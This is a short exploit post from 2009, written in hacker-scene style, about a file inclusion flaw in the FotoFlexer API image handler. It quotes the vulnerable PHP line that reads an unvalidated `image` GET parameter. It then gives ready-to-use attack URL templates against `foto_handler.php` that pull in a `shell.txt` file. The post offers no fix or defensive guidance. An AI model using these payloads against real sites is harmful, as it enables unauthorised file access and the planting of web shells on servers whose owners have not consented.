FotoFlexer API (image) Local File Inclusion Vulnerability
2009-07-20 22:03:51[+]##############################################
[+] |____ViRuS_HiMa@YouR SyS__|__\ #
[+] |______________________|___||\*___ #
[+] |______________________|___||""|"*\___, #
[+] |______________________|___||""|*"|___|| #
[+] "([ (@)''(@)""""""(|*(@)(@)********(@)* #
[+]===========================================================================||
[*] SupeSite : FotoFlexer API Local File Inclusion Vulnerability . ||
[!] Download : http://fotoflexer.com/api_download.php ||
[!] Author : ViRuS_HiMa ||
[!] Site : WwW.Hell.z0ne.org ||
[!] E-Mail : eGypT_GoVeRnMenT[at]HoTmaiL[dot]CoM ||--------
[!] Location : Cairo-007 ||
[!]===================================================================||
[!] Poc : ||
[!] ||
[!] Line : 4 ||
[!] ||
[!] $image = $_GET['image']; ||
[!]===================================================================||
[*] Exploitation : ||
[!] ||
[!] [target]/FilePath?image=[shell.txt?] ||
[!] ||
[!] [target]/foto_handler.php?image=[shell.txt?] ||
[!]===================================================================||
[!]Greetz 2 Allah - Muslim Hackers - Str0ke - And oTherz . ||
[*]===================================================================||
#
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.

